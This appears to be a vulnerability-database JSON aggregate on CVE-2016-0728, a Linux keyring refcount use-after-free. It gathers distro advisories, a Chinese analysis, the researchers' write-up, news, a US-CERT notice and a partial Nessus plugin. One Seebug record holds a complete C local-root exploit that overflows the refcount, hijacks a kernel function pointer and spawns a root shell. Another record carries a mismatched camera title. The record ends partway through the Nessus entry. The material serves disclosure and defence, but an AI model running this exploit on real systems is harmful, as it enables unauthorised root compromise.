join_session_keyring in security/keys/process_keys.c holds a\nreference to the requested keyring, but if that keyring is the same as\nthe one being currently used by the process, the kernel wouldn't\ndecrease keyring->usage before returning to userspace. 
The usage field\ncan be possibly overflowed causing use-after-free on the keyring object.", "modified": "2016-01-25T00:00:00", "published": "2016-01-25T00:00:00", "id": "ASA-201601-26", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-January/000531.html", "type": "archlinux", "title": "linux-lts: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-02T18:44:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0728"], "description": "It was reported that possible use-after-free vulnerability in keyring\nfacility, possibly leading to local privilege escalation, was found.\nFunction join_session_keyring in security/keys/process_keys.c holds a\nreference to the requested keyring, but if that keyring is the same as\nthe one being currently used by the process, the kernel wouldn't\ndecrease keyring->usage before returning to userspace. The usage field\ncan be possibly overflowed causing use-after-free on the keyring object.", "modified": "2016-01-20T00:00:00", "published": "2016-01-20T00:00:00", "id": "ASA-201601-20", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-January/000525.html", "type": "archlinux", "title": "linux: privilege escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T12:10:49", "description": "### \u6f0f\u6d1e\u5206\u6790\r\n\r\n\r\nLinux Kernel\u7684\u8fd9\u4e2a\u6f0f\u6d1e\u4f1a\u9020\u6210\u4e24\u4e2a\u5f71\u54cd\uff0c\u7b2c\u4e00\u4e2a\u662f\u9020\u6210\u4fe1\u606f\u6cc4\u9732\uff0c\u53ef\u4ee5bypass 
ASLR\uff0c\u53e6\u4e00\u4e2a\u662fUAF\u9020\u6210\u4ee3\u7801\u6267\u884c\uff0c\u5229\u7528\u7684\u662fKeyRing\u673a\u5236\u4e2d\u7684\u4e24\u4e2a\u6f0f\u6d1e\uff0c\u4e00\u4e2a\u662f\u5bf9Keyring\u64cd\u4f5c\u63a7\u5236\u4e0d\u4e25\u8c28\uff0c\u53e6\u4e00\u4e2a\u662f\u5229\u7528\u5bf9Keyring\u8ba1\u6570\u53d8\u91cf\u63a7\u5236\u4e0d\u4e25\u8c28\uff0c\u5176\u4e2d\u4ee3\u7801\u6267\u884c\u5229\u7528\u6761\u4ef6\u76f8\u5bf9\u82db\u523b\uff0c\u4e0b\u9762\u5bf9\u6b64\u6f0f\u6d1e\u8fdb\u884c\u8be6\u7ec6\u5206\u6790\u3002\r\n\r\nKeyring\u4fe1\u606f\u6cc4\u9732\uff1a\r\n\r\nKeyring\u548c\u5b89\u5168\u5bc6\u94a5\u6709\u5173\uff0c\u8fdb\u7a0b\u53ef\u4ee5\u7533\u8bf7\u81ea\u5df1\u65b0\u7684keyring\uff0c\u540c\u65f6\u4e5f\u53ef\u4ee5\u901a\u8fc7\u7533\u8bf7\u65b0\u7684keyring\u66ff\u6362\u8001\u7684keyring\uff0c\u5176\u4e2d\uff0c\u8c03\u7528\u5230join_session_keyring\u51fd\u6570\u3002\r\n\r\n```\r\nlong join_session_keyring(const char *name)\r\n{\r\n ...\r\n new = prepare_creds();\r\n ...\r\n keyring = find_keyring_by_name(name, false); //find_keyring_by_name increments keyring->usage if a keyring was found\r\n if (PTR_ERR(keyring) == -ENOKEY) {\r\n /* not found - try and create a new one */\r\n keyring = keyring_alloc(\r\n name, old->uid, old->gid, old,\r\n KEY_POS_ALL | KEY_USR_VIEW | KEY_USR_READ | KEY_USR_LINK,\r\n KEY_ALLOC_IN_QUOTA, NULL);\r\n if (IS_ERR(keyring)) {\r\n ret = PTR_ERR(keyring);\r\n goto error2;\r\n }\r\n```\r\n\r\n\u8fd9\u91cc\u4f1a\u901a\u8fc7find_keyring_by_name\uff0c\u53bb\u67e5\u770b\u5f53\u524d\u8bf7\u6c42\u8fdb\u7a0b\u662f\u5426\u5df2\u7ecf\u5b58\u5728keyring\uff0c\u5982\u679c\u4e0d\u5b58\u5728\uff0c\u5219\u4f1a\u521b\u5efa\u4e00\u4e2a\u65b0\u7684keyring\uff0c\u800c\u5f53\u5b58\u5728\u65f6\uff0c\u5219\u4f1a\u6267\u884c\u4e0b\u9762\u7684\u51fd\u6570\u903b\u8f91\u3002\r\n\r\n```\r\n ret = install_session_keyring_to_cred(new, keyring);\r\n if (ret < 0)\r\n goto error2;\r\n commit_creds(new);\r\n mutex_unlock(&key_session_mutex);\r\n ret = 
keyring->serial;\r\n key_put(keyring);\r\n```\r\n\r\n\u4f1a\u5229\u7528\u65b0\u7684keyring\u66ff\u6362\u8001\u7684keyring\uff0c\u8fd9\u91cc\u90fd\u6ca1\u6709\u95ee\u9898\uff0c\u4f46\u662f\u6709\u53e6\u4e00\u4e2a\u51fd\u6570\u903b\u8f91\u662f\u5b58\u5728\u95ee\u9898\u7684\u5730\u65b9\u3002\r\n\r\n```\r\nelse if (keyring == new->session_keyring) {\r\n ret = 0;\r\n goto error2; //<-- The bug is here, skips key_put.\r\n }\r\n```\r\n\r\n\u5f53\u65b0\u7533\u8bf7\u7684keyring\u548c\u8001\u5f97keyring\u76f8\u7b49\u7684\u65f6\u5019\uff0c\u5219\u4f1a\u8df3\u8f6c\u5230error2\u6267\u884c\uff0c\u800c\u5728error2\u91cc\u3002\r\n\r\n```\r\nerror2:\r\n mutex_unlock(&key_session_mutex);\r\n```\r\n\r\n\u4f1a\u8c03\u7528mutex_unlock\u6cc4\u9732keryring\u7684\u5f15\u7528\u4fe1\u606f\uff0c\u9020\u6210\u4fe1\u606f\u6cc4\u9732\u3002\r\n\r\n\r\n\u91ca\u653e\u540e\u91cd\u7528\u6f0f\u6d1e\uff1a\r\n\r\n\u8fd9\u4e2a\u6f0f\u6d1e\u53d1\u751f\u4e8ekeyring\u7684\u8ba1\u6570\u4e2d\uff0c\u8fd9\u4e2a\u8ba1\u6570\u5b58\u653e\u4e8e\u4e00\u4e2ausage\u6570\u636e\u57df\u4e2d\uff0c\u5f53\u6bcf\u6b21\u7533\u8bf7\u4e00\u6b21keyring\uff0c\u6570\u636e\u57df\u8ba1\u6570\u5c31\u4f1a\u52a01\uff0c\u8fd9\u4e2a\u6570\u636e\u57df\u662fatomic_t\u7c7b\u578b\uff0c\u4e5f\u5c31\u662f\u8bf4\u5b58\u5728\u4e0a\u9650\u3002\r\n\r\n\u800c\u5728\u6574\u4e2a\u8fc7\u7a0b\u4e2d\uff0c\u6ca1\u6709\u5bf9\u8fd9\u4e2a\u6570\u636e\u57df\u8ba1\u6570\u7684\u5927\u5c0f\u8fdb\u884c\u5224\u65ad\uff0c\u4ece\u800c\u5bfc\u81f4\u4e0d\u65ad\u7533\u8bf7keyring\u76f4\u81f3\u8d85\u8fc7\u6570\u636e\u57df\u5927\u5c0f\u7684\u65f6\u5019\uff0cusage\u4f1a\u7f6e0\uff0c\u8fd9\u4e2a\u8fc7\u7a0b\u4f1a\u91ca\u653ekeyring\uff0c\u800c\u8fd9\u4e2a\u8fc7\u7a0b\u4f1a\u4ea7\u751f\u4e00\u4e2a\u60ac\u5782\u6307\u9488\uff0c\u5728\u7533\u8bf7keyring\u7684\u65f6\u5019\uff0c\u901a\u8fc7\u7cbe\u5fc3\u6784\u9020\u8fd9\u4e2a\u8fc7\u7a0b\uff0c\u53ef\u4ee5\u8986\u76d6\u8fd9\u4e2a\u60ac\u5782\u6307\u9488\u3002\r\n\r\n\u8986\u76d6\u5185\u5bb9\u4f7f\u7528\u5185\u6838\u4ee3\u7801\u
ff0c\u5f53\u518d\u6b21\u5f15\u7528\u7684\u65f6\u5019\uff0c\u53ef\u4ee5\u5f15\u53d1\u4ee3\u7801\u6267\u884c\u3002", "published": "2016-05-20T00:00:00", "type": "seebug", "title": "Linux\u5185\u6838 Keyrings \u5f15\u7528\u8ba1\u6570\u6ea2\u51fa UAF \u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-05-20T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-91603", "id": "SSV:91603", "sourceData": "\n # Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings\r\n# Date: 19/1/2016\r\n# Exploit Author: Perception Point Team\r\n# CVE : CVE-2016-0728\r\n \r\n/* CVE-2016-0728 local root exploit\r\n modified by Federico Bento to read kernel symbols from /proc/kallsyms\r\n props to grsecurity/PaX for preventing this in so many ways\r\n \r\n $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall\r\n $ ./cve_2016_072 PP_KEY */\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <sys/types.h>\r\n#include <keyutils.h>\r\n#include <unistd.h>\r\n#include <time.h>\r\n#include <unistd.h>\r\n \r\n#include <sys/ipc.h>\r\n#include <sys/msg.h>\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* \r\n_prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\n \r\n#define STRUCT_LEN (0xb8 - 0x30)\r\n#define COMMIT_CREDS_ADDR (0xffffffff810bb050)\r\n#define PREPARE_KERNEL_CREDS_ADDR (0xffffffff810bb370)\r\n \r\n \r\n \r\nstruct key_type {\r\n char * name;\r\n size_t datalen;\r\n void * vet_description;\r\n void * preparse;\r\n void * free_preparse;\r\n void * instantiate;\r\n void * update;\r\n void * match_preparse;\r\n void * match_free;\r\n void * revoke;\r\n void * destroy;\r\n};\r\n \r\n/* thanks spender - Federico Bento */\r\nstatic unsigned long get_kernel_sym(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy;\r\n char 
sname[256];\r\n int ret;\r\n \r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if (f == NULL) {\r\n fprintf(stdout, \"Unable to obtain symbol listing!\\n\");\r\n exit(0);\r\n }\r\n \r\n ret = 0;\r\n while(ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fprintf(stdout, \"[+] Resolved %s to %p\\n\", name, (void *)addr);\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n \r\n fclose(f);\r\n return 0;\r\n}\r\n \r\nvoid userspace_revoke(void * key) {\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n \r\nint main(int argc, const char *argv[]) {\r\n const char *keyring_name;\r\n size_t i = 0;\r\n unsigned long int l = 0x100000000/2;\r\n key_serial_t serial = -1;\r\n pid_t pid = -1;\r\n struct key_type * my_key_type = NULL;\r\n \r\n struct {\r\n long mtype;\r\n char mtext[STRUCT_LEN];\r\n } msg = {0x4141414141414141, {0}};\r\n int msqid;\r\n \r\n if (argc != 2) {\r\n puts(\"usage: ./keys <key_name>\");\r\n return 1;\r\n }\r\n \r\n printf(\"[+] uid=%d, euid=%d\\n\", getuid(), geteuid());\r\n commit_creds = (_commit_creds)get_kernel_sym(\"commit_creds\");\r\n prepare_kernel_cred = \r\n(_prepare_kernel_cred)get_kernel_sym(\"prepare_kernel_cred\");\r\n if(commit_creds == NULL || prepare_kernel_cred == NULL) {\r\n commit_creds = (_commit_creds)COMMIT_CREDS_ADDR;\r\n prepare_kernel_cred = \r\n(_prepare_kernel_cred)PREPARE_KERNEL_CREDS_ADDR;\r\n if(commit_creds == (_commit_creds)0xffffffff810bb050 \r\n|| prepare_kernel_cred == (_prepare_kernel_cred)0xffffffff810bb370)\r\n puts(\"[-] You probably need to change the address of \r\ncommit_creds and prepare_kernel_cred in source\");\r\n }\r\n \r\n my_key_type = malloc(sizeof(*my_key_type));\r\n \r\n my_key_type->revoke = (void*)userspace_revoke;\r\n memset(msg.mtext, 'A', sizeof(msg.mtext));\r\n \r\n // key->uid\r\n *(int*)(&msg.mtext[56]) = 0x3e8; /* geteuid() */\r\n //key->perm\r\n 
*(int*)(&msg.mtext[64]) = 0x3f3f3f3f;\r\n \r\n //key->type\r\n *(unsigned long *)(&msg.mtext[80]) = (unsigned long)my_key_type;\r\n \r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"msgget\");\r\n exit(1);\r\n }\r\n \r\n keyring_name = argv[1];\r\n \r\n /* Set the new session keyring before we start */\r\n \r\n serial = keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name);\r\n if (serial < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n \r\n if (keyctl(KEYCTL_SETPERM, serial, KEY_POS_ALL | KEY_USR_ALL | \r\nKEY_GRP_ALL | KEY_OTH_ALL) < 0) {\r\n perror(\"keyctl\");\r\n return -1;\r\n }\r\n \r\n \r\n puts(\"[+] Increfing...\");\r\n for (i = 1; i < 0xfffffffd; i++) {\r\n if (i == (0xffffffff - l)) {\r\n l = l/2;\r\n sleep(5);\r\n }\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"[-] keyctl\");\r\n return -1;\r\n }\r\n }\r\n sleep(5);\r\n /* here we are going to leak the last references to overflow */\r\n for (i=0; i<5; ++i) {\r\n if (keyctl(KEYCTL_JOIN_SESSION_KEYRING, keyring_name) < 0) {\r\n perror(\"[-] keyctl\");\r\n return -1;\r\n }\r\n }\r\n \r\n puts(\"[+] Finished increfing\");\r\n puts(\"[+] Forking...\");\r\n /* allocate msg struct in the kernel rewriting the freed keyring \r\nobject */\r\n for (i=0; i<64; i++) {\r\n pid = fork();\r\n if (pid == -1) {\r\n perror(\"[-] fork\");\r\n return -1;\r\n }\r\n \r\n if (pid == 0) {\r\n sleep(2);\r\n if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) {\r\n perror(\"[-] msgget\");\r\n exit(1);\r\n }\r\n for (i = 0; i < 64; i++) {\r\n if (msgsnd(msqid, &msg, sizeof(msg.mtext), 0) == -1) {\r\n perror(\"[-] msgsnd\");\r\n exit(1);\r\n }\r\n }\r\n sleep(-1);\r\n exit(1);\r\n }\r\n }\r\n \r\n puts(\"[+] Finished forking\");\r\n sleep(5);\r\n \r\n /* call userspace_revoke from kernel */\r\n puts(\"[+] Caling revoke...\");\r\n if (keyctl(KEYCTL_REVOKE, KEY_SPEC_SESSION_KEYRING) == -1) {\r\n perror(\"[+] keyctl_revoke\");\r\n }\r\n \r\n printf(\"uid=%d, 
euid=%d\\n\", getuid(), geteuid());\r\n execl(\"/bin/sh\", \"/bin/sh\", NULL);\r\n \r\n return 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-91603", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T13:08:46", "description": "## Introduction\r\nThe Perception Point Research team has identified a 0-day local privilege escalation vulnerability in the Linux kernel. While the vulnerability has existed since 2012, our team discovered the vulnerability only recently, disclosed the details to the Kernel security team, and later developed a proof-of-concept exploit. As of the date of disclosure, this vulnerability has implications for approximately tens of millions of Linux PCs and servers, and 66 percent of all Android devices (phones/tablets). While neither we nor the Kernel security team have observed any exploit targeting this vulnerability in the wild, we recommend that security teams examine potentially affected devices and implement patches as soon as possible.\r\n\r\nIn this write-up, we\u2019ll discuss the technical details of the vulnerability as well as the techniques used to achieve kernel code execution using the vulnerability. Ultimately, the PoC provided successfully escalates privileges from a local user to root.\r\n\r\n## The Bug\r\nCVE-2016-0728 is caused by a reference leak in the keyrings facility. Before we dive into the details, let\u2019s cover some background required to understand the bug.\r\n\r\nQuoting directly from its manpage, the keyrings facility is primarily a way for drivers to retain or cache security data, authentication keys, encryption keys and other data in the kernel. System call interfaces \u2013 the keyctl syscall (there are two other syscalls that are used for handling keys: add_key and request_key. keyctl, however, is definitely the most important one for this write-up.) 
are provided so that userspace programs can manage those objects and use the facility for their own purposes.\r\n\r\nEach process can create a keyring for the current session using keyctl(KEYCTL_JOIN_SESSION_KEYRING, name) and can choose to either assign a name to the keyring or not by passing NULL. The keyring object can be shared between processes by referencing the same keyring name. If a process already has a session keyring, this same system call will replace its keyring with a new one. If an object is shared between processes, the object\u2019s internal refcount, stored in a field called usage, is incremented. The leak occurs when a process tries to replace its current session keyring with the very same one. As we see in the next code snippet, taken from kernel version 3.18, the execution jumps to the error2 label, which skips the call to key_put and leaks the reference that was increased by find_keyring_by_name.\r\n\r\nTriggering the bug from userspace is fairly straightforward, as we can see in the following code snippet:\r\n\r\nwhich results in the following output, showing the leaked keyring with 100 references:\r\n\r\n## Exploiting the Bug\r\nEven though the bug itself can directly cause a memory leak, it has far more serious consequences. After a quick examination of the relevant code flow, we found that the usage field used to store the reference count for the object is of type atomic_t, which under the hood is basically an int \u2013 meaning 32-bit on both 32-bit and 64-bit architectures. While every integer can theoretically be overflowed, this particular observation makes practical exploitation of this bug as a way to overflow the reference count seem feasible. And it turns out no checks are performed to prevent the usage field from wrapping around to 0.\r\n\r\nIf a process causes the kernel to leak 0x100000000 references to the same object, it can later cause the kernel to think the object is no longer referenced and consequently free the object. 
If the same process holds another legitimate reference and uses it after the kernel freed the object, it will cause the kernel to reference deallocated or reallocated memory. This way, we can achieve a use-after-free by using the exact same bug from before. A lot has been written on use-after-free vulnerability exploitation in the kernel, so the following steps wouldn\u2019t surprise an experienced vulnerability researcher. The outline of the steps to be executed by the exploit code is as follows:\r\n\r\n 1.Hold a (legitimate) reference to a key object\r\n 2.Overflow the same object\u2019s usage\r\n 3.Get the keyring object freed\r\n 4.Allocate a different kernel object from user-space, with user-controlled content, over the same memory previously used by the freed keyring object\r\n 5.Use the reference to the old key object and trigger code execution\r\nStep 1 is covered entirely by the manpage, step 2 was explained earlier. Let\u2019s dive into the technical details of the rest of the steps.\r\n\r\n## Overflowing usage Refcount\r\nThis step is actually an extension of the bug. The usage field is of int type which means it has a max value of 2^32 both on 32-bit and 64-bit architectures. To overflow the usage field we have to loop the snippet above 2^32 times to get usage to zero.\r\n\r\n## Freeing keyring object\r\nThere are a couple of ways to get the keyring object freed while holding a reference to it. One possible way is using one process to overflow the keyring usage field to 0 and getting the object freed by the Garbage Collection algorithm inside the keyring subsystem, which frees any keyring object the moment the usage counter is 0.\r\n\r\nOne caveat though: if we look at the join_session_keyring function, prepare_creds also increments the current session keyring and abort_creds or commit_creds decrements it respectively. 
The problem is that abort_creds doesn\u2019t decrement the keyring\u2019s usage field synchronously but it is called later using an RCU job, which means we can overflow the usage counter without knowing it was overflowed. It is possible to solve this issue by using sleep(1) after each call to join_session_keyring, but of course it is not feasible to sleep(2^32) seconds. A feasible workaround is to use a variation of the divide-and-conquer algorithm and to sleep after 2^31-1 calls, then after 2^30-1 etc\u2026 this way we never overflow unintentionally because the maximum value of the refcount can be double the value it should be if no jobs were called.\r\n\r\n## Allocating and controlling kernel object\r\nHaving our process point to a freed keyring object, now we need to allocate a kernel object that will override the freed keyring object. That will be easy thanks to how SLAB memory works, allocating many objects of the keyring size just after the object is freed. We choose to use the Linux IPC subsystem to send messages of size 0xb8 \u2013 0x30 where 0xb8 is the size of the keyring object and 0x30 is the size of a message header.\r\n\r\n\r\nThis way we control the lower 0x88 bytes of the keyring object.\r\n\r\n## Gaining kernel code execution\r\nFrom here it\u2019s pretty easy thanks to the struct key_type inside the keyring object which contains many function pointers. An interesting function pointer is the revoke function pointer which can be invoked using the keyctl(KEYCTL_REVOKE, key_name) syscall. The following is the Linux kernel snippet calling the revoke function:\r\n\r\nThe keyring object should be filled as follows:\r\n\r\n\r\n\r\nThe uid and flags attributes should be filled that way to pass a few control checks until the execution gets to key->type->revoke. The type field should point to a user-space struct containing the function pointers with revoke pointing to a function that will be executed with root privileges. 
Here is a code snippet that demonstrates this.\r\n\r\nThe addresses of the commit_creds and prepare_kernel_cred functions are static and can be determined per Linux kernel version/android device.\r\n\r\nNow the last step is of course:\r\n\r\nHere is a link to the full exploit which runs on kernel 3.18 64-bit; the following is the output of running the full exploit, which takes about 30 minutes to run on an Intel Core i7-5500 CPU (usually time is not an issue in a privilege escalation exploit):\r\n\r\n\r\n\r\n## Mitigations & Conclusions\r\nThe vulnerability affects any Linux Kernel version 3.8 and higher. SMEP & SMAP, as well as SELinux on Android devices, will make it difficult to exploit. Maybe we\u2019ll talk about tricks to bypass those mitigations in upcoming blogs; in any case, the most important thing for now is to patch it as soon as you can.", "published": "2016-01-28T00:00:00", "type": "seebug", "title": "ACTi E31 surveillance Cameras \u5f31\u5bc6\u7801\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-90673", "id": "SSV:90673", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-01-27T10:06:43", "bulletinFamily": "info", "cvelist": ["CVE-2016-0728"], "description": "[](<https://3.bp.blogspot.com/-S8Lo8NeHvOQ/Vp5yAJBQmWI/AAAAAAAAmRs/oDB6ZyBJA2M/s1600/linux-kernel-hacking.png>)\n\nA new critical zero-day vulnerability has been discovered in the **Linux kernel** that could allow attackers to gain root level privileges by running a malicious Android or Linux application on an affected device.\n\n \n\n\nThe critical Linux kernel flaw ([CVE-2016-0728](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2016-0728>)) has been identified by a group of researchers at a startup named Perception Point.\n\nThe vulnerability has been present in the code since 2012, and affects any operating 
system with **Linux kernel 3.8 and higher**, so there are probably tens of millions of computers, both 32-bit and 64-bit, exposed to this flaw.\n\n \n\n\nHowever, the most bothersome part is that the problem affects **Android versions KitKat and higher**, which means about 66 percent of all Android devices are also exposed to the serious Linux kernel flaw.\n\n \n\n\n \n\n\n### Impact of the Zero-Day Vulnerability\n\n \n\n\nAn attacker would only require local access to exploit the flaw on a Linux server.\n\n \n\n\nIf successfully exploited, the vulnerability can allow attackers to get root access to the operating system, enabling them to delete files, view private information, and install malicious apps.\n\n> _\"It's pretty bad because a user with legitimate or lower privileges can gain root access and compromise the whole machine,\" _**Yevgeny Pats**, co-founder and CEO at security vendor Perception Point, said in a [blog post](<http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/>) published today. \n_\"With no auto update for the kernel, these versions could be vulnerable for a long time. Every Linux server needs to be patched as soon the patch is out.\"_\n\nUsually, flaws in the Linux kernel are patched as soon as they are found; therefore, Linux-based operating systems are considered to be more secure than others. However, the zero-day vulnerability recently discovered in the Linux kernel went unnoticed for almost 3 years.\n\n \n\n\n### The Cause of the Critical Linux Kernel Vulnerability\n\n[](<https://4.bp.blogspot.com/-L-rODbAqKbE/Vp5zlCS0lRI/AAAAAAAAmR4/VL1nAAdEK48/s1600/linux-root-exploit.png>)\n\nThe vulnerability is actually the result of a **Reference Leak** in the keyrings facility built into various flavors of Linux. 
The keyrings facility is primarily a way to encrypt and store login data, encryption keys and certificates, and then make them available to applications.\n\n \n\n\nHowever, a reference leak could be abused by attackers to ultimately execute arbitrary code in the Linux kernel.\n\n \n\n\nSo far, the researchers said, no exploits have been discovered in the wild that take advantage of this vulnerability.\n\n \n\n\nPerception Point has provided a technical analysis of the vulnerability and how one can exploit it, including [proof-of-concept](<https://gist.github.com/PerceptionPointTeam/18b1e86d1c0f8531ff8f>) (PoC) exploit code published on its Github page.\n\n \n\n\n### Patch Expected to Roll Out Soon\n\n \n\n\nThe good news is that Perception Point has already reported the flaw to the Linux team, and patches are expected to roll out today to devices with automatic updates.\n\n \n\n\nHowever, it may take a little longer on Android devices to receive the patch, given the fact that most updates aren\u2019t pushed automatically by manufacturers and carriers. \n \n\n\n### **How to Patch the Linux Kernel Vulnerability (CVE-2016-0728)**\n\nType the following commands for your Linux distro:\n\n * **Debian or Ubuntu Linux:** sudo apt-get update && sudo apt-get upgrade\n * **RHEL / CentOS Linux:** sudo yum update\n\n \n\n\n \n\n\n### UPDATE \u2014 Kernel bug Not A Big Deal for Android Users\n\n \n\n\nNow, Google has claimed, as expected, that Perception Point's claim \u2013 that about 66 percent of all Android devices are also exposed to the serious Linux kernel flaw \u2013 is not entirely accurate.\n\n \n\n\nAccording to the search engine giant, the number of Android devices affected by this zero-day flaw is significantly smaller than initially reported by Perception Point. \n\n> \"_We believe that no Nexus devices are vulnerable to exploitation by 3rd party applications. 
Further, devices with Android 5.0 and above are protected, as the Android SELinux policy prevents 3rd party applications from reaching the affected code_,\" [said](<https://plus.google.com/+AdrianLudwig/posts/KxHcLPgSPoY>) Adrian Ludwig, Android's lead security engineer.\n\n> \"_Also, many devices running Android 4.4 and earlier do not contain the vulnerable code introduced in Linux kernel 3.8, as those newer kernel versions not common on older Android devices._\"\n\nThe company also added that it has prepared a patch that has already been released to open source and provided to partners, and that \"_the patch will be required on all devices with a security patch level of March 1, 2016, or greater._\"\n", "modified": "2016-01-22T06:43:02", "published": "2016-01-19T06:30:00", "id": "THN:2F321B0D3CF635D0F8D272948E9B31C9", "href": "https://thehackernews.com/2016/01/linux-kernel-hacker.html", "type": "thn", "title": "Zero-Day Flaw Found in 'Linux Kernel' leaves Millions Vulnerable", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cisa": [{"lastseen": "2020-12-18T18:07:44", "bulletinFamily": "info", "cvelist": ["CVE-2016-0728"], "description": "US-CERT is aware of a Linux kernel vulnerability affecting Linux PCs and servers and Android-based devices. 
Exploitation of this vulnerability may allow an attacker to take control of an affected system.\n\nUS-CERT recommends that users and administrators review the [Redhat Security Blog](<https://access.redhat.com/security/cve/CVE-2016-0728>) and the [Debian Security Bug Tracker](<https://security-tracker.debian.org/tracker/CVE-2016-0728>) for additional details and refer to their Linux or Unix-based OS vendors for appropriate patches.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ncas/current-activity/2016/01/19/Linux-Kernel-Vulnerability>); we'd welcome your feedback.\n", "modified": "2016-01-19T00:00:00", "published": "2016-01-19T00:00:00", "id": "CISA:FCB4B9C4CB605F6B805399E8D3B54A48", "href": "https://us-cert.cisa.gov/ncas/current-activity/2016/01/19/Linux-Kernel-Vulnerability", "type": "cisa", "title": "Linux Kernel Vulnerability", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-20T15:29:21", "description": "Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-20T00:00:00", "title": "Ubuntu 15.10 : linux-raspi2 vulnerability (USN-2872-3)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-20T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:15.10", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-raspi2"], "id": "UBUNTU_USN-2872-3.NASL", "href": "https://www.tenable.com/plugins/nessus/88016", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2872-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88016);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2872-3\");\n\n script_name(english:\"Ubuntu 15.10 : linux-raspi2 vulnerability (USN-2872-3)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. 
